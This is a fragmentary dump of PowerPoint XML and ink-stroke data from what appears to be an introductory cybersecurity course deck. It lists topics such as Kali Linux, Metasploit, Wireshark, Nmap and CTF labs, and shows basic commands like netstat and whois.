  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="39555.51">4723 8096 0,'-13'0'47,"-67"0"-31,67 0-16,0 0 15,-40 0 1,40 0-16,-27 0 15,27 0 1,-1 0 0,1 0 156,-13 0-157,13 0-15,-1 13 0,1 1 16,-27 52-1,14-53-15,13-13 0,-14 40 16,27-27 0,0 0-16,-13 27 31,0-14-15,13-12 15,0-1-16,0 0 48,0 0-47,0 1-1,0-1 1,0 0-16,0 13 15,0 27 1,0-13 0,0 13-1,13-13 1,-13-27 0,13 0-16,0 0 93,14 53-77,-14-26 15,0-40-15,14 13 140,-1-13-140,-12 0-16,12 0 31,-13 14-15,0-14-1,1 0 1,-1 0-1,0 0-15,0 0 0,27 0 16,0 0 0,-1 13-1,1 0 1,-27 0-16,14-13 94,-14 0-79,66 0 63,-52-26-62,-27 13-16,13 13 0,0-14 16,-13 1-1,14-13-15,-14 12 0,0-12 16,13-27 0,0-26-1,0 39 1,-13 27-16,13-14 15,1-26 1,-14 40 0,0-13-16,0-14 15,0 14 1,0 12 15,0-25 63,0 12-78,-27 14-1,14 0 63,0 0-62,-27-14 0,27 1 15,0-1-16,-14 14 1,27 0-16,-13-1 16,13-25-1,-13 12 1,-1 1 0,1-1-1,-13 1 63,13 13-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="42726.97">16206 7739 0,'92'0'109,"186"27"-93,-251-27-16,158 0 31,-132 0-15,-40 0-1,0 0 1,27 13 15,0 0-15,-27-13 0,0 0-1,0 0 1,40 0-1,-40 0-15,1 0 16,-1 0-16,0 0 0,-13-13 47,13-120-16,-13 120-31,14-13 0,-1-40 16,13-133-1,-13 173-15,1-1 0,12-39 16,1-26 0,-27 78-16,0-25 15,0 12 1,0-13 0,0 27-1,0 0 32,0 0 16,-67 0-32,41 13-31,13 0 0,-40 0 15,-79 0 1,39 0-16,0 0 0,-39 13 16,-93 13-1,172-13-15,-66 14 16,53-27 0,40 13-1,-1-13 63,14 13 0,13 27-62,0-13-16,0 39 16,0 0-1,0-40-15,0 27 16,0-13 0,0 26-1,0 13 1,0 14-1,0-14 1,0-39 0,0 0 156,13-40-32,14 0-124,52 0-1,40 0 1,-93 0-16,27 0 16,-26 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="49007.43">13110 11126 0,'13'0'16,"-13"-14"0,0 1-1,0-13 17,-79 26-1,66 0-31,-67 0 15,54 0-15,-53 0 16,26 0 0,26 0-16,1 0 15,-54 0 1,67 0-16,-27 0 16,-39 0-1,53 0-15,12 0 0,-12 0 16,-54 26-1,54-26-15,-40 13 16,-27 1 15,80-14-31,-13 0 32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="49938.25">12078 11126 0,'-13'0'32,"-66"0"-17,65 0-15,-52 0 16,-53 0 15,40 0-15,-27 0-1,13 0 1,-12 0 0,91 0-16,-39 0 15,14 0 1,12 0 0,-12 0-1,25 0-15,-25 0 16,25 0-16,1 0 15,0 0-15,0 0 16,-1 0 0,-12 0-1,-14-14 1,-26 1 0,-13 0 15,66 13-31,-1 0 15,1 0 110</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="50679.02">10306 11112 0,'-27'0'31,"-13"14"-16,-13-1 1,1 0 0,-28 0-1,-26 14 1,40-27-16,0 0 0,-93 26 16,1-12-1,38-1 1,54-13-1,40 0 1,-14 0 0,27 0-1,0 0-15,-27 0 32,14 0-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="53188.25">18944 11192 0,'-13'0'78,"-27"0"157,1 0-220,12 0-15,1 0 0,12 0 0,-25 0 16,-67 0 0,-13 0-1,79 0-15,-13 0 16,40-13 109,13-1-110,0 1-15,0 0 0,0-14 16,0-12 0,-13 12-1,13-12 1,0 25-16,0 1 0,0 0 16,0 0-16,0-40 15,0-66 1,26 79-1,-13 0 1,-13 27-16,14 0 16,-1 0-16,0-14 15,27 1 1,26-1 15,-53 14-31,0 13 16,67 0 31,-27 0-32,-40 0-15,146 0 16,-53 0 0,-93 0-1,0 0 141,0 27-140,-13-14-16,0 0 0,13-13 16,1 26-1,-14-12-15,0 12 16,13 80 0,-13-80-16,0 67 15,0-66-15,-13-1 0,13 14 16,0-27-1,0 0-15,-14-13 0,14 13 16,-39 40 0,26-40-1,-27 54-15,13-14 16,14-40 0,-13 13-16,12-13 31,1 1-16,-13 12 1,-1 14 0,-12-14-1,39-12 1,-14-1 46,1 0-46</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="54229.65">14049 11284 0,'14'0'47,"-1"0"-16,0 0-15,14 0-16,12 14 15,213 39 1,52-27 0,-145-13-1,-133 1-15,-13-14 0,14 0 16,-14 0-16,0 0 31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="54930">15994 11152 0,'79'0'78,"-26"0"-63,-26 0-15,26 0 0,145 0 16,146 0 0,-238 0-1,-66 0 1,-1 0 0,1 0-1,-14-13-15,14 0 16,79 13-1,-13 0 1,40 0 0,-1-14-1,-66-12 1,-65 26 0,-1 0-16,0 0 15,0 0 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="55727.98">15266 11602 0,'0'0'0,"120"0"94,184 40-79,-212-40 1,67 0-16,-106 0 16,53 0-16,13 0 31,13 0-16,-119 0-15,80 0 16,-27-27 0,-39 27-1,12-13 1,-25 13 0,12-13-1,-13 13 1,1 0 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2:59:16.5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2:59:49.6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0 288 24575,'4'-4'0,"4"0"0,11-4 0,14-4 0,11-7 0,2-7 0,3-6 0,1-5 0,-1 0 0,8-17 0,-5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2:59:58.65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5-02T12:30:02.53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15121 8321 0,'13'0'16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2:01:12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2:01:39.6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145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145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28034" y="361652"/>
            <a:ext cx="1735931" cy="97646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1392362"/>
            <a:ext cx="9753600" cy="11392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748056"/>
            <a:ext cx="5283200" cy="1451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2748056"/>
            <a:ext cx="5283200" cy="1451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27638" y="361950"/>
            <a:ext cx="1736725" cy="976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1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27638" y="361950"/>
            <a:ext cx="1736725" cy="976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27638" y="361950"/>
            <a:ext cx="1736725" cy="976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8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1276" y="254888"/>
            <a:ext cx="6767195" cy="602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40" y="1165352"/>
            <a:ext cx="3288029" cy="2787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818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0667" y="1192340"/>
            <a:ext cx="8060055" cy="3319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1.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image145.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image144.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image152.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131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39.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image151.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image134.png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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image146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30.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image149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41.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image145.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image154.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image144.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image152.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131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39.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image151.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image134.png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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image146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30.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image149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41.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image145.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image154.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image144.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image152.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131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39.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image151.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image134.png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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image146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30.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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6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5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.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink2.xml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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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hyperlink" Target="http://support.microsoft.com/kb/10388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1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tools.ietf.org/html/rfc5735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3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3513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49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51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7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image" Target="../media/image52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assignments/service-names-port-numbers/service-names-port-numbers.xhtml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80.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107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3.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91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99.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108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049020"/>
            <a:ext cx="9144000" cy="3613150"/>
            <a:chOff x="761" y="1049274"/>
            <a:chExt cx="9144000" cy="3392805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="761" y="112420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Introduction to Cybersecurity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610362" y="1735073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 Box 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1200150"/>
            <a:ext cx="2301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/>
              <a:t>cys.tech1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029200" y="1151255"/>
            <a:ext cx="3703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/>
              <a:t>mostafa al-jabale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90220" y="1734820"/>
            <a:ext cx="3691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/>
              <a:t>Course contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-JO" altLang="en-US"/>
              <a:t>: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7530" y="2190750"/>
            <a:ext cx="362458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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Kali Linux Basics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>2. Networking Fundamentals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>3. Tool Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>4. Tool wireshark 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4876800" y="2190750"/>
            <a:ext cx="27666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5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Tool Nmap </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>6. Labs CTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>7. Special concepts in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>    cybersecurity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85E5-55CF-5A53-2C73-CEF1F62F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B8B37-1025-2C75-69C2-57B68F869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2077624-5399-E921-E21C-D27C8A1EEAEF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FEB43EA-D376-F80C-52F1-94A7570055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8529600-7891-A95D-AD35-082C3701069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10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07FD053-61E0-ADE0-8226-540BE5C0B78C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7B5EA99F-8FD1-AA03-AC4F-A5666CDFE26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EA5D6A4A-04D4-6BAC-2C71-8F2A5C329DEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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DC25ED7B-D78D-3B1C-CA9C-CB974211839C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5B90DFDC-F59A-B648-49EE-F74FEE5915E3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E6C44DA9-41C3-9D2F-089D-1584A30859F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AFDF663F-476C-63F5-C5B9-75F761B62D5B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8E2B87FD-AD37-BE12-E66D-20AFC67E90DD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099BF83E-7DBD-4FC6-7A27-3B8963C7FEB7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10</a:t>
            </a:fld>
            <a:endParaRPr spc="-20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184B3D2-B36E-FABA-A991-DCF525BFFAA4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1.2 All Kali Linux commands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BD516808-B242-A3E8-C569-D125627F6238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467583" y="1915698"/>
            <a:ext cx="29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-netstat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18D5E7-3A1C-DFCA-3201-E4E2D17B4DD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1718768" y="2056879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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D10F3AA-9604-D9B3-ACEB-9E5ABBBC15A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314065" y="1861486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 connection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96CA8BC6-172C-F390-9E8B-D3089A6DD5D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599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-netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tunap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     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25DA12-9617-071B-B0F3-1E5DB41708C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2625398" y="2503861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52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{903638CB-BD51-FE45-AE0E-E761A88F9030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4139996" y="2313214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connection in TCP/UDP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{419119BE-43E6-6F86-D4AC-E1AFB3815498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="2724150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netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>tuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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F05879-C3D5-ED9B-B387-566018BEC0E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612097" y="2926327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 Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E9300CC-7F12-1AE9-E79D-81C993453174}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4137254" y="2749550"/>
            <a:ext cx="3113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port listen connect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06550252-A031-A476-AAEA-6F22EDF5135F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="3184323"/>
            <a:ext cx="331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netstat -r</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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6275C143-E7C1-4539-FF0E-2490B7675E2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3969298" y="3214963"/>
            <a:ext cx="300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Routing table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3E7135-F5DC-DD55-4AF8-4F069F8CFC97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411184" y="3418859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0CAD4FC-F132-75C6-EEBA-D736E295EC75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2945447" y="3835764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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5922AA9-28F7-49DC-058C-47A19DA8B32B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3603453"/>
            <a:ext cx="30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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> google.com  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFBD72D3-A152-0096-461D-D06412FC9BA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4339057" y="3661575"/>
            <a:ext cx="36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Information Gathering  in google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881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C545E74-C87F-47AF-1D9F-1F2618A6DC84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Packet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Filtering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vs.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Application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Attacks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055C434-B97F-D550-2B58-DBEDDDF72E46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1078092"/>
            <a:ext cx="79603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company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hosts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web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server.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firewall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allow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all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incoming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traffic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Internet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direct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80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of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web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server.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F8BAFFFE-EB5C-E175-6972-4443AA9C3F45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1101687" y="2059242"/>
            <a:ext cx="7166768" cy="2733631"/>
            <a:chOff x="979932" y="2058364"/>
            <a:chExt cx="7166768" cy="2733631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C1AFE057-4D8B-69A6-9393-B3BD6E6509EF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1004058" y="2294881"/>
              <a:ext cx="3385820" cy="2176145"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3385820" h="2176145">
                  <a:moveTo>
                    <a:pt x="1419445" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1314897" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258602" y="8043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202306" y="24130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1178180" y="32173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1150032" y="40217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073631" y="76412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1025378" y="108586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965062" y="156847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924851" y="197064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908767" y="221194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="892682" y="241303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876598" y="265433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864534" y="285542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852471" y="309672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836387" y="333803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828345" y="361955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812260" y="410215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="804218" y="438367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800197" y="462498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792155" y="518802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792155" y="591193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="768028" y="595215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739881" y="599236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715754" y="607280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687606" y="615323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667501" y="627389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643374" y="643475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623269" y="655541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570995" y="715866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534805" y="784236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526763" y="832496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522742" y="864670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526763" y="880757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526763" y="904888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498615" y="896844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466446" y="888801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434278" y="884779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406130" y="884779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361898" y="888801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321687" y="892822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281476" y="904888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245286" y="916953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209096" y="933040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144759" y="973257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88464" y="1025539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28147" y="1118039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16084" y="1154234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1226626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1307060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16084" y="1379451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28147" y="1415647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68358" y="1479994"/>
                  </a:lnTo>
